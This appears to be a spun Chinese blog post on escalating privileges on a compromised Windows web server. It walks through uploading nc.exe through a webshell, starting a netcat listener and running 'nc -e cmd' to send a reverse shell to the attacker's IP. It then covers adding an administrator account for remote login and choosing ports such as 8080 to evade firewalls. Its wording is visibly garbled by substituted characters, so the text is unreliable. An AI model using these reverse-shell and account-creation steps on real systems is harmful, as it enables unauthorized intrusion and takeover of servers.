NC反弹CMDSHELL提权总结

2020-04-09 365bet官网 阅读

  Server-U等都不成以用的状况下. 通俗都可思考用此方法

  不外这类方法, 只需对方装了防火墙, 或是樊篱掉落了除经常使用的那几个端口外的一切端口… 那么这类方法也掉效了….

  1:经过shell将上传NC和CMD传到站点目次下(这里必然上传的留心权限,最好是可读写目次下)

  web目次都是有写有读的权限,我们直接传NC出来

  

  ?

  2:然后当地履行nc -vv -lp 52停止反弹

  

  ?

  3:在shell敕令下履行

  F:\wwwroot\img\nc.exe? -e cmd上传门路? IP(外网IP)? 52(这里是本机端口)

  

  ?

  4:在shell里履行敕令后,立时看到当地CMS里曾经反弹上去了,履行net user 也是胜利.

  

  ?

  5:直接添加用户,然后远程去连接!

  

  ?

  看到添加胜利,也设置为办理组了!接上去直接远程连接就OK!?

  ?

  ?

  很多人NC提权没有胜利过,因为个中的启事是你没有降低权限,而招致了NC提权掉败

  掉败总结:

  1.反弹端口

  网上很多文章写 反弹端口445 110 甚么的,你当防火墙呆子是否是,我建议看一下端口有没有8080端口,假设没有8080端口的话,要反弹8080

  端口,如许被防火墙阻拦的概率较小

  2.降低运转权限

  1.现在当地监听一个端口

  nc -vv -l -p 8080 //最好是80或8080如许的端口,被防火墙阻挡的概率很小。

  2.在WebShell运转下面敕令连接我们监听的端口掉掉落CmdShell:

  nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假定cmd.exe是上传在"C:\Documents and Settings\All

  Users\Documents"这个目次

  ?

标签: